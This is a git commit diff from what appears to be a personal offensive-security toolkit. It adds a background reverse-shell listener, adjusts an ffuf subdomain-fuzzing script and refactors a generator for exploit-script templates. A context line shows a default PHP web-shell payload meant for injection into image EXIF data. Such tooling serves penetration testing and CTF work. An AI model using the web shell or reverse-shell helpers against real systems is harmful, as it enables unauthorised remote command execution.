new functions

2023-10-01 11:23:05 +02:00 · 2023-10-01 11:23:05 +02:00 · b4a96e1398
commit b4a96e1398
parent b3cd20ca8b
5 changed files with 85 additions and 27 deletions
--- a/rev_shell.py
+++ b/rev_shell.py
@ -300,6 +300,13 @@ def generate_payload(type, local_address, port, index=None):
 def spawn_listener(port):
    pty.spawn(["nc", "-lvvp", str(port)])

+def spawn_background_shell(port):
+    listener = ShellListener("0.0.0.0", port)
+    listener.startBackground()
+    while listener.connection is None:
+        time.sleep(0.5)
+    return listener
+
 def trigger_shell(func, port):
    def _wait_and_exec():
        time.sleep(1.5)
--- a/sshserver.py
+++ b/sshserver.py
@ -66,11 +66,9 @@ class SSHServer:
                    paramiko_connection = ParamikoConnection(self)
                    transport.start_server(server=paramiko_connection)
                    self.transports.append(transport)
-                    # for client_sock in self.client_sockets:

                except BlockingIOError:
                    pass
-                # handle_client(client_socket, client_address)
        finally:
            self.listen_socket.close()

@ -81,7 +79,7 @@ class SSHServer:

    def close(self):
        if self.listen_socket:
-            self.listen_socket.close()
+            self.listen_socket.shutdown(socket.SHUT_RDWR)
        for sock in self.client_sockets:
            sock.close()

--- a/subdomainFuzz.sh
+++ b/subdomainFuzz.sh
@ -32,6 +32,6 @@ charcountNonExistent=$(curl -s "${PROTOCOL}://$(uuidgen).${DOMAIN}" -k -m 5 | wc
 echo "[+] Chars: ${charcountDomain}, ${charcountIpAddress}, ${charcountNonExistent}"
 echo "[ ] Fuzzing…"

-ffuf --fs ${charcountDomain},${charcountIpAddress},${charcountNonExistent} --fc 400 --mc all \
+(set -x; ffuf --fs ${charcountDomain},${charcountIpAddress},${charcountNonExistent} --fc 400 --mc all \
  -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt \
-  -u "${PROTOCOL}://${IP_ADDRESS}" -H "Host: FUZZ.${DOMAIN}" "${@:2}"
+  -u "${PROTOCOL}://${IP_ADDRESS}" -H "Host: FUZZ.${DOMAIN}" "${@:2}")
--- a/template.py
+++ b/template.py
@ -2,26 +2,21 @@

 import sys

-def generateTemplate(baseUrl):
-    template = """#!/usr/bin/env python
+def generate_template(base_url, features):

-import os
-import sys
-import json
-import time
-import base64
-import requests
-import subprocess
-import urllib.parse
-from bs4 import BeautifulSoup
-from hackingscripts import util, fileserver, rev_shell
+    if "proxy" in features or "burp" in features:
+        proxy = """
+    if \"proxy\" not in kwargs:
+        kwargs[\"proxy\"] = {\"http\":\"http://127.0.0.1:8080\", \"https\":\"http://127.0.0.1:8080\"}
+"""
+    else:
+        proxy = ""

-from urllib3.exceptions import InsecureRequestWarning
-requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
+    variables = {
+        "BASE_URL": f'"{base_url}" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337"'
+    }

-BASE_URL = "%s" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337"
-
-def request(method, uri, **kwargs):
+    request_method = f"""def request(method, uri, **kwargs):
    if not uri.startswith("/") and uri != "":
        uri = "/" + uri

@ -35,24 +30,78 @@ def request(method, uri, **kwargs):
    
    if "verify" not in kwargs:
        kwargs["verify"] = False
-
+    {proxy}
    return client.request(method, BASE_URL + uri, **kwargs)
+"""

+    methods = [request_method]
+
+    if "login" in features or "account" in features:
+        variables["USERNAME"] = '"Blindhero"'
+        variables["PASSWORD"] = '"test1234"'
+        methods.append("""
+def login(username, password):
+    session = requests.Session()
+    res = request("POST", "/login", data={"username": username, "password": password}, session=session)
+    if res.status_code != 200:
+        print("[-] Error logging in")
+        exit()
+    
+    return session
+""")
+
+    if "register" in features or "account" in features:
+        variables["USERNAME"] = '"Blindhero"'
+        variables["PASSWORD"] = '"test1234"'
+        methods.append("""
+def register(username, password):
+    res = request("POST", "/register", data={"username": username, "password": password})
+    if res.status_code != 200:
+        print("[-] Error registering")
+        exit()
+    
+    return True
+""")
+
+    main = """
 if __name__ == "__main__":
    pass
-""" % baseUrl
+"""

-    return template
+    variables = "\n".join(f"{k} = {v}" for k, v in variables.items())
+    header = f"""#!/usr/bin/env python
+
+import os
+import re
+import sys
+import json
+import time
+import base64
+import requests
+import subprocess
+import urllib.parse
+from bs4 import BeautifulSoup
+from hackingscripts import util, fileserver, rev_shell
+
+from urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
+
+{variables}
+
+"""
+
+    return header + "".join(methods) + main

 if __name__ == "__main__":

    if len(sys.argv) < 2:
-        print("Usage: %s <URL>" % sys.argv[0])
+        print("Usage: %s <URL> [features]" % sys.argv[0])
        exit()

    url = sys.argv[1]
    if "://" not in url:
        url = "http://" + url

-    template = generateTemplate(url)
+    features = [] if len(sys.argv) < 3 else sys.argv[2].split(",")
+    template = generate_template(url, features)
    print(template)
--- a/util.py
+++ b/util.py
@ -3,6 +3,7 @@
 import random
 import math
 import socket
+import base64
 import itertools
 import netifaces as ni
 import string
@ -209,6 +210,9 @@ def xor(a, b):

    return b"".join([bytes([c1 ^ c2]) for (c1,c2) in zip(a, b) ])

+def base64urldecode(data):
+    return base64.urlsafe_b64decode(data + b'=' * (4 - len(data) % 4))
+
 def set_exif_data(payload="<?php system($_GET['c']);?>", _in=None, _out=None, exif_tag=None):
    import exif